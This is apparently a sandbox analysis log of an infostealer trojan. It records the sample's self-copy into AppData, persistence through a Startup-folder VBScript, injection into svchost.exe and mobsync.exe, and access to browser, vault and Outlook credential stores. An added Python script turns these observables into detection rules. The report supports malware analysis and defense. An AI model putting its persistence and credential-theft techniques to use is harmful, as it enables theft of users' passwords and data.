                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F132D9_2_033F132D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332D34C9_2_0332D34C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0338739A9_2_0338739A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033452A09_2_033452A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E12ED9_2_033E12ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335B2C09_2_0335B2C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0340B16B9_2_0340B16B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332F1729_2_0332F172
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0337516C9_2_0337516C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334B1B09_2_0334B1B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F70E99_2_033F70E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FF0E09_2_033FF0E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033EF0CC9_2_033EF0CC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033470C09_2_033470C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FF7B09_2_033FF7B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033856309_2_03385630
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F16CC9_2_033F16CC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F75719_2_033F7571
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_034095C39_2_034095C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DD5B09_2_033DD5B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FF43F9_2_033FF43F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033314609_2_03331460
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FFB769_2_033FFB76
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335FB809_2_0335FB80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B5BF09_2_033B5BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0337DBF99_2_0337DBF9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B3A6C9_2_033B3A6C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FFA499_2_033FFA49
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F7A469_2_033F7A46
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DDAAC9_2_033DDAAC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03385AA09_2_03385AA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E1AA39_2_033E1AA3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033EDAC69_2_033EDAC6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D59109_2_033D5910
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033499509_2_03349950
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335B9509_2_0335B950
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AD8009_2_033AD800
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033438E09_2_033438E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FFF099_2_033FFF09
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FFFB19_2_033FFFB1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03341F929_2_03341F92
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03303FD29_2_03303FD2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03303FD59_2_03303FD5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03349EB09_2_03349EB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F7D739_2_033F7D73
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F1D5A9_2_033F1D5A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03343D409_2_03343D40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335FDC09_2_0335FDC0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B9C329_2_033B9C32
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FFCF29_2_033FFCF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0332B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 033BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03375130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 033AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03387E54 appears 111 times
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Code function: String function: 000F7DE1 appears 35 times
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Code function: String function: 00118900 appears 42 times
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Code function: String function: 00110AE3 appears 70 times
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: String function: 00C10AE3 appears 70 times
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: String function: 00BF7DE1 appears 35 times
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: String function: 00C18900 appears 42 times
Source: 25Lz840Dmh.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@14/11@4/2
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C5A06A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C481CB AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C487E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Code function: 7_2_001481CB AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Code function: 7_2_001487E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C5B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C6EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C5C397 CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00BF4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | File created: C:\Users\user\AppData\Local\Dalymore
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | File created: C:\Users\user~1\AppData\Local\Temp\autE43B.tmp
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs"
Source: 25Lz840Dmh.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: mobsync.exe, 0000000F.00000002.2540011755.00000000031B7000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2540011755.0000000003189000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.2071881069.0000000003167000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2540011755.0000000003193000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.2073584338.0000000003189000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 25Lz840Dmh.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | File read: C:\Users\user\Desktop\25Lz840Dmh.exe
Source: unknown | Process created: C:\Users\user\Desktop\25Lz840Dmh.exe "C:\Users\user\Desktop\25Lz840Dmh.exe"
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Process created: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe "C:\Users\user\Desktop\25Lz840Dmh.exe"
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\25Lz840Dmh.exe"
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe "C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe"
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe"
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
Source: C:\Windows\SysWOW64\mobsync.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Sections loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, ntmarta.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, apphelp.dll
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Sections loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll
Source: C:\Windows\System32\wscript.exe | Sections loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mlang.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Sections loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, ntmarta.dll
Source: C:\Windows\SysWOW64\mobsync.exe | Sections loaded: wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | Sections loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\SysWOW64\mobsync.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
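The process chain, DLL loads and registry accesses listed above are raw observables; the script below is an added example, not part of the Joe Sandbox report and not code from the sample, that runs a few detection rules over events constructed from those lines (image path versus command-line mismatch for the hollowed fricandeaus.exe and svchost.exe, a script host launched from the Startup folder that then spawns an executable from AppData, a browser started by mobsync.exe, the winsqlite3/dpapi/vaultcli load set, and the Outlook profile key). Rule names, the credential-DLL set, the "expected browser parent" allowlist and the user-writable path markers are assumptions of the example, not statements made by the report.

```python
"""Detection pass over process, image-load and registry events from this report.

Added example (not part of the Joe Sandbox report or the sample). The event
lists are constructed from the report's 'Process created', 'Section loaded'
and 'Key opened' lines; rule names, DLL sets and allowlists are assumptions.
"""
import ntpath

USER_WRITABLE = ("\\users\\", "\\programdata\\")          # assumed user-writable roots
# Loaded together by a non-browser: SQLite for browser Login Data, DPAPI to
# unwrap the blobs, vaultcli for Windows Vault. Assumed indicator set.
CRED_DLLS = {"winsqlite3.dll", "dpapi.dll", "vaultcli.dll"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
STARTUP_DIR = "\\start menu\\programs\\startup\\"

# (parent image, child image, child command line), taken from the report.
PROCESS_EVENTS = [
    ("unknown", r"C:\Users\user\Desktop\25Lz840Dmh.exe",
     r'"C:\Users\user\Desktop\25Lz840Dmh.exe"'),
    (r"C:\Users\user\Desktop\25Lz840Dmh.exe",
     r"C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe",
     r'"C:\Users\user\Desktop\25Lz840Dmh.exe"'),
    (r"C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe",
     r"C:\Windows\SysWOW64\svchost.exe", r'"C:\Users\user\Desktop\25Lz840Dmh.exe"'),
    ("unknown", r"C:\Windows\System32\wscript.exe",
     r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs"'),
    (r"C:\Windows\System32\wscript.exe",
     r"C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe",
     r'"C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe"'),
    (r"C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe",
     r"C:\Windows\SysWOW64\mobsync.exe", r'"C:\Windows\SysWOW64\mobsync.exe"'),
    (r"C:\Windows\SysWOW64\mobsync.exe",
     r"C:\Program Files\Mozilla Firefox\firefox.exe",
     r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
]
# process image -> DLLs loaded (a subset of the report's 'Section loaded' lines).
IMAGE_LOADS = {
    r"C:\Users\user\Desktop\25Lz840Dmh.exe": {"wsock32.dll", "wininet.dll", "cryptsp.dll", "rsaenh.dll"},
    r"C:\Windows\System32\wscript.exe": {"vbscript.dll", "amsi.dll", "scrrun.dll", "urlmon.dll"},
    r"C:\Windows\SysWOW64\mobsync.exe": {"wininet.dll", "winhttp.dll", "winsqlite3.dll",
                                         "vaultcli.dll", "dpapi.dll", "cryptbase.dll"},
}
# (process image, registry key opened), from the report.
REGISTRY_EVENTS = [
    (r"C:\Users\user\Desktop\25Lz840Dmh.exe",
     "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers"),
    (r"C:\Windows\SysWOW64\mobsync.exe",
     "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\"),
]


def image_name(path):
    return ntpath.basename(path).lower()


def cmdline_image(cmdline):
    """Executable named by the first command-line token (quoted or bare)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def is_user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)


def process_findings(events=PROCESS_EVENTS):
    out = []
    for parent, child, cmdline in events:
        p, c = image_name(parent), image_name(child)
        # Hollowing tell: the image on disk is not the one the command line names.
        # Some launchers do this legitimately, so score it rather than block on it.
        if c != image_name(cmdline_image(cmdline)):
            out.append(("image-cmdline-mismatch", child, cmdline))
        if c in SCRIPT_HOSTS and STARTUP_DIR in cmdline.lower():
            out.append(("script-host-startup-folder", child, cmdline))
        if p in SCRIPT_HOSTS and is_user_writable(child):
            out.append(("script-host-spawns-user-exe", parent, child))
        if c in BROWSERS and p not in BROWSERS | {"explorer.exe"}:
            out.append(("browser-unexpected-parent", parent, child))
    return out


def image_load_findings(loads=IMAGE_LOADS):
    return [("credential-dll-bundle", proc, sorted(CRED_DLLS))
            for proc, dlls in loads.items()
            if CRED_DLLS <= dlls and image_name(proc) not in BROWSERS]


def registry_findings(events=REGISTRY_EVENTS):
    return [("outlook-profile-access", proc, key) for proc, key in events
            if "\\outlook\\profiles" in key.lower() and image_name(proc) != "outlook.exe"]


def run_all():
    return process_findings() + image_load_findings() + registry_findings()


if __name__ == "__main__":
    for rule, subject, detail in run_all():
        print(f"{rule:28} {subject}  <-  {detail}")
```

On this report's events the pass yields seven findings: two image/command-line mismatches (fricandeaus.exe and svchost.exe both created with the parent's command line), the Startup-folder .vbs run by wscript.exe and its child from AppData, firefox.exe started by mobsync.exe, the credential-DLL bundle in mobsync.exe, and mobsync.exe opening the Outlook profile key. The mismatch rule is the one to treat with most care in production: the same signal appears in a few legitimate launchers, so it belongs in a scoring model alongside the others rather than as a standalone block.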
Source: 25Lz840Dmh.exe | Static file information: File size 1169920 > 1048576
Source: 25Lz840Dmh.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 25Lz840Dmh.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 25Lz840Dmh.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 25Lz840Dmh.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 25Lz840Dmh.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 25Lz840Dmh.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 25Lz840Dmh.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000009.00000003.1833889985.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1834286425.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1834319067.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, LHSqcaLVnKQk.exe, 0000000E.00000002.2540758141.0000000000918000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LHSqcaLVnKQk.exe, 0000000E.00000002.2539118267.00000000002EE000.00000002.00000001.01000000.00000008.sdmp, LHSqcaLVnKQk.exe, 00000012.00000002.2539220837.00000000002EE000.00000002.00000001.01000000.00000008.sdmp
                    Source: Binary string: wntdll.pdbUGP source: fricandeaus.exe, 00000007.00000003.1312932820.0000000003910000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 00000007.00000003.1314493954.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1754528154.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1866311823.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1752855756.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1866311823.000000000349E000.00000040.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1471204213.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1457026966.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1456050155.0000000003960000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1904206851.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1896489032.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1904206851.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1898737196.0000000003500000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.1868498675.0000000004A24000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.1870865385.0000000004BD5000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2543297116.0000000004F1E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2543297116.0000000004D80000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: fricandeaus.exe, 00000007.00000003.1312932820.0000000003910000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 00000007.00000003.1314493954.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000003.1754528154.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1866311823.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1752855756.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1866311823.000000000349E000.00000040.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1471204213.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1457026966.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1456050155.0000000003960000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1904206851.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1896489032.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1904206851.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1898737196.0000000003500000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.1868498675.0000000004A24000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.1870865385.0000000004BD5000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2543297116.0000000004F1E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2543297116.0000000004D80000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: mobsync.pdb source: svchost.exe, 00000009.00000003.1833889985.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1834286425.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1834319067.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, LHSqcaLVnKQk.exe, 0000000E.00000002.2540758141.0000000000918000.00000004.00000020.00020000.00000000.sdmp
Source: 25Lz840Dmh.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 25Lz840Dmh.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 25Lz840Dmh.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 25Lz840Dmh.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 25Lz840Dmh.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00BF4B37 LoadLibraryA,GetProcAddress, 5_2_00BF4B37
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00BFC4E0 push cs; ret 5_2_00BFC526
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00BFC732 push ss; ret 5_2_00BFC735
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00BFC730 push ss; ret 5_2_00BFC731
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00BFC89E push ds; ret 5_2_00BFC8A1
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00BFC88A push ss; ret 5_2_00BFC899
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00BFC888 push ds; ret 5_2_00BFC889
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00BFC883 push ds; ret 5_2_00BFC885
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00BFC87B push ds; ret 5_2_00BFC881
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00BFC877 push ds; ret 5_2_00BFC879
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00BFC867 push ds; ret 5_2_00BFC86D
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C18945 push ecx; ret 5_2_00C18958
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C30BDD push es; ret 5_2_00C30BE0
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C30BE1 push es; ret 5_2_00C30BE4
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C30BBE push es; ret 5_2_00C30BDC
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_000FC4FE push A3000FBAh; retn 000Fh 7_2_000FC50D
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_00118945 push ecx; ret 7_2_00118958
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0041E9A4 push ecx; retf 9_2_0041E9A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00411B63 push es; iretd 9_2_00411B64
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00418C73 push ecx; iretd 9_2_00418C7A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0041EC7E push cs; iretd 9_2_0041EC7F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00407C3D pushad ; retf 9_2_00407C48
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_004034C0 push eax; ret 9_2_004034C2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00418EE6 push es; iretd 9_2_00418EE7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0040D7D7 push eax; ret 9_2_0040D7DC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0040879B push 00000062h; retf 9_2_004087A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0330225F pushad ; ret 9_2_033027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_033027FA pushad ; ret 9_2_033027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_033309AD push ecx; mov dword ptr [esp], ecx 9_2_033309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0330283D push eax; iretd 9_2_03302858
Source: C:\Users\user\Desktop\25Lz840Dmh.exe File created: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe

                    Boot Survival

Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00BF48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 5_2_00BF48D7
